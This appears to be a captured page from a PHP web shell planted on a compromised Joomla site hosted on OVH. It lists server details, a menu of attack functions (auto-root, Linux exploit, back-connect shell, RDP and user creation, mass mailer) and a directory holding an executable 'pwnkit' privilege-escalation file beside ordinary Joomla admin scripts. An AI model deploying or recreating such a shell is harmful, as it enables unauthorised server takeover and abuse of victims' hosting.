Linux webm002.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.120.20.2 | : 216.73.216.49
Cant Read [ /etc/named.conf ]
8.5.7
verseaumee
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
verseaumee /
zenit /
media /
com_cpanel /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
admin-add_module-es5.js
2.49
KB
-rw----r--
admin-add_module-es5.min.js
1.03
KB
-rw----r--
admin-add_module-es5.min.js.gz
459
B
-rw----r--
admin-add_module.js
2.26
KB
-rw----r--
admin-add_module.min.js
956
B
-rw----r--
admin-add_module.min.js.gz
440
B
-rw----r--
admin-cpanel-default-es5.js
4.53
KB
-rw----r--
admin-cpanel-default-es5.min.j...
1.95
KB
-rw----r--
admin-cpanel-default-es5.min.j...
946
B
-rw----r--
admin-cpanel-default.js
3.72
KB
-rw----r--
admin-cpanel-default.min.js
1.71
KB
-rw----r--
admin-cpanel-default.min.js.gz
851
B
-rw----r--
admin-system-loader-es5.js
2.47
KB
-rw----r--
admin-system-loader-es5.min.js
1.1
KB
-rw----r--
admin-system-loader-es5.min.js...
520
B
-rw----r--
admin-system-loader.js
2.27
KB
-rw----r--
admin-system-loader.min.js
1.04
KB
-rw----r--
admin-system-loader.min.js.gz
502
B
-rw----r--
pwnkit
0
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : admin-add_module.js
/** * @copyright (C) 2019 Open Source Matters, Inc. <https://www.joomla.org> * @license GNU General Public License version 2 or later; see LICENSE.txt */ (document => { document.addEventListener('DOMContentLoaded', () => { window.jSelectModuleType = () => { const elements = document.querySelectorAll('#moduleDashboardAddModal .modal-footer .btn.hidden'); if (elements.length) { setTimeout(() => { elements.forEach(button => { button.classList.remove('hidden'); }); }, 1000); } }; const buttons = document.querySelectorAll('#moduleDashboardAddModal .modal-footer .btn'); const hideButtons = []; let isSaving = false; if (buttons.length) { buttons.forEach(button => { if (button.classList.contains('hidden')) { hideButtons.push(button); } button.addEventListener('click', event => { let elem = event.currentTarget; // There is some bug with events in iframe where currentTarget is "null" // => prevent this here by bubble up if (!elem) { elem = event.target; } if (elem) { const clickTarget = elem.dataset.bsTarget; // We remember to be in the saving process isSaving = clickTarget === '#saveBtn'; // Reset saving process, if e.g. the validation of the form fails setTimeout(() => { isSaving = false; }, 1500); const iframe = document.querySelector('#moduleDashboardAddModal iframe'); const content = iframe.contentDocument || iframe.contentWindow.document; const targetBtn = content.querySelector(clickTarget); if (targetBtn) { targetBtn.click(); } } }); }); } const elementH = document.querySelector('#moduleDashboardAddModal'); if (elementH) { elementH.addEventListener('hide.bs.modal', () => { hideButtons.forEach(button => { button.classList.add('hidden'); }); }); elementH.addEventListener('hidden.bs.modal', () => { if (isSaving) { setTimeout(() => { window.parent.location.reload(); }, 1000); } }); } }); })(document);
Close